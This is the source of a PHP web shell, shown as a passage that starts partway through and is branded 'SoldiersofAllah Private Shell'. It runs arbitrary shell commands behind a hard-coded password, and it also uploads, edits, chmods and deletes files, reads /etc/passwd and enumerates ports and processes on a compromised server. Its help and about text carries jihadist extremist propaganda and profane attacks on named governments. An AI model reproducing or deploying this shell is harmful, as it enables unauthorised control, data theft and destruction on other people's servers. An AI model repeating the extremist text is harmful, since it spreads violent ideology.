'ClearScreen()', 'Clear History' => 'ClearHistory()', 'Can I function?' => "runcommand('canirun','GET')", 'Get server info' => "runcommand('showinfo','GET')", 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", 'Running processes' => "runcommand('ps -aux','GET')", 'Readme' => "runcommand('shellhelp','GET')" ); $thisfile = basename(__FILE__); $style = ''; $password='alqaeda'; $sess = __FILE__.$password; if(isset($_POST['p4ssw0rD'])) { if($_POST['p4ssw0rD'] == $password) { $_SESSION[$sess] = $_POST['p4ssw0rD']; } else { die("Wrong password"); } } if($_SESSION[$sess] == $password) { if(isset($_SESSION['workdir'])) { if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) { chdir($_SESSION['workdir']); } } if(isset($_FILES['uploadedfile']['name'])) { $target_path = "./"; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { } } if(isset($_GET['runcmd'])) { $cmd = $_GET['runcmd']; print "".get_current_user()."~# ". htmlspecialchars($cmd)."
"; if($cmd == "") { print "Empty Command..type \"shellhelp\" for some ehh...help"; } elseif($cmd == "upload") { print '
Uploading to: '.realpath("."); if(is_writable(realpath("."))) { print "
I can write to this directory"; } else { print "
I can't write to this directory, please choose another one."; } } elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) { if(file_exists($file[1]) && is_dir($file[1])) { chdir($file[1]); $_SESSION['workdir'] = $file[1]; print "Current directory changed to ".$file[1]; } else { print "Directory not found"; } } elseif(strtolower($cmd) == "shellhelp") { print '
In The Name Of Allah
© by SoldiersofAllah We are here.. Because this is our ideologi and our breath

Jihad is our way!!! Die as Syuhada or be a good moslem...

free for Palestine,iraq,Afghanistan,somalia,and every moslem country

No respect for nasionalism,democracy,capitalism,liberalism,n All ideology what contradiction in Al-Quran and sunnah Fuck to Israel,USA,UK,Indonesian government,Saudi government And Every government who always hating every mujahideen =[]= Soldiers of Allah was here and controlling your system =[]= '; } elseif(ereg("editfile (.*)",$cmd,$file)) { if(file_exists($file[1]) && !is_dir($file[1])) { print "

"; } else { print "File not found."; } } elseif(ereg("deletefile (.*)",$cmd,$file)) { if(is_dir($file[1])) { if(rmdir($file[1])) { print "Directory succesfully deleted."; } else { print "Couldn't delete directory!"; } } else { if(unlink($file[1])) { print "File succesfully deleted."; } else { print "Couldn't delete file!"; } } } elseif(strtolower($cmd) == "canirun") { print "If any of these functions is Enabled, the shell will function like it should.
"; if(function_exists(passthru)) { print "Passthru: Enabled
"; } else { print "Passthru: Disabled
"; } if(function_exists(exec)) { print "Exec: Enabled
"; } else { print "Exec: Disabled
"; } if(function_exists(system)) { print "System: Enabled
"; } else { print "System: Disabled
"; } if(function_exists(shell_exec)) { print "Shell_exec: Enabled
"; } else { print "Shell_exec: Disabled
"; } print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a
reason why the commands aren't executed, this is probally it.
"; if( ini_get('safe_mode') ){ print "Safe Mode: Enabled"; } else { print "Safe Mode: Disabled"; } print "

Open_basedir will block access to some files you shouldn't access.
"; if( ini_get('open_basedir') ){ print "Open_basedir: Enabled"; } else { print "Open_basedir: Disabled"; } } //About the shell elseif(ereg("listdir (.*)",$cmd,$directory)) { if(!file_exists($directory[1])) { die("Directory not found"); } //Some variables chdir($directory[1]); $i = 0; $f = 0; $dirs = ""; $filez = ""; if(!ereg("/$",$directory[1])) //Does it end with a slash? { $directory[1] .= "/"; //If not, add one } print "Listing directory: ".$directory[1]."
"; print ""; if ($handle = opendir($directory[1])) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $dirs[$i] = $file; $i++; } else { $filez[$f] = $file; $f++; } } print "
"; foreach($dirs as $directory) { print "[D][W]".$directory."
"; } print "
"; foreach($filez as $file) { print "[D]".$file."
"; } print "
"; } } elseif(strtolower($cmd) == "about") { print "Soldiers of Allah private shell.
Version $version"; } //Show info elseif(strtolower($cmd) == "showinfo") { if(function_exists(disk_free_space)) { $free = disk_free_space("/") / 1000000; } else { $free = "N/A"; } if(function_exists(disk_total_space)) { $total = trim(disk_total_space("/") / 1000000); } else { $total = "N/A"; } $path = realpath ("."); print "Free: $free / $total MB
Current path: $path
Uname -a Output:
"; if(function_exists(passthru)) { passthru("uname -a"); } else { print "Passthru is disabled :("; } } //Read /etc/passwd elseif(strtolower($cmd) == "etcpasswdfile") { $pw = file('/etc/passwd/'); foreach($pw as $line) { print $line; } } //Execute any other command else { if(function_exists(passthru)) { passthru($cmd); } else { if(function_exists(exec)) { exec("ls -la",$result); foreach($result as $output) { print $output."
"; } } else { if(function_exists(system)) { system($cmd); } else { if(function_exists(shell_exec)) { print shell_exec($cmd); } else { print "Sorry, none of the command functions works."; } } } } } } elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) { $file = $_POST['filetosave']; if(!is_writable($file)) { if(!chmod($file, 0777)) { die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^ } } $fh = fopen($file, 'w'); $dt = $_POST['filecontent']; fwrite($fh, $dt); fclose($fh); } else { ?> SoldiersofAllah Private Shell | Edited By KingDefacer ~ <?php print getenv("HTTP_HOST"); ?>

Quick Linux/Unix Commands
$execute) { print ' 
'; } ?>
Command history

About US

SoldiersOfAllah private shell
Modified by cyberkalashnikov

In The Name Of Allah
Dedicated for all of SoldiersOfAllah members
[Execute command] [Upload file] [Change directory] [Filebrowser] [Create File]
Login Step ~ <?php print getenv("HTTP_HOST"); ?>

Please login before use your stuff
"; } ?>